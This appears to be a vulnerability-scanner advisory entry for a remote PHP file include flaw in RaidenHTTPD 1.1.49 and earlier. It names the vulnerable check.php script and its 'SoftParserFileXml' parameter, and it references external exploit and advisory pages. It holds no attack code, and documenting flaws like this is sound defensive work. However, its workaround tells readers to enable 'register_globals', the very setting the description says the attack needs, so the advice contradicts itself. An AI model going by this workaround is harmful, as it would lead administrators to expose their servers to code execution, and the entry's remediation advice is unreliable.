| VID |
21975 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The RaidenHTTPD HTTP server is vulnerable to a multiple remote file include vulnerability via the check.php script. RaidenHTTPD is a full featured web server for Microsoft Windows operating systems. RaidenHTTPD version 1.1.49 and earlier versions could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the the 'SoftParserFileXml' parameter of the '/raidenhttpd-admin/slice/check.php' script. If PHP's 'register_globals' and 'WebAdmin' settings is enabled, a remote attacker can send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://www.frsirt.com/english/advisories/2006/3542
http://milw0rm.com/exploits/2328
http://secunia.com/advisories/21833
* Platforms Affected:
RaidenHTTPD Team, RaidenHTTPD version 1.1.49 and earlier versions
Microsoft Windows Any version |
| Recommendation |
No upgrade or patch available as of Sep 2006.
Upgrade to a version of RaidenHTTPD greater than 1.1.49, when new fixed version becomes available from the RaidenHTTPD Web site at http://www.raidenhttpd.com/en/index.html
As a workaround, enable PHP's 'register_globals' setting. |
| Related URL |
CVE-2006-4723 (CVE) |
| Related URL |
19918 (SecurityFocus) |
| Related URL |
28821 (ISS) |
|
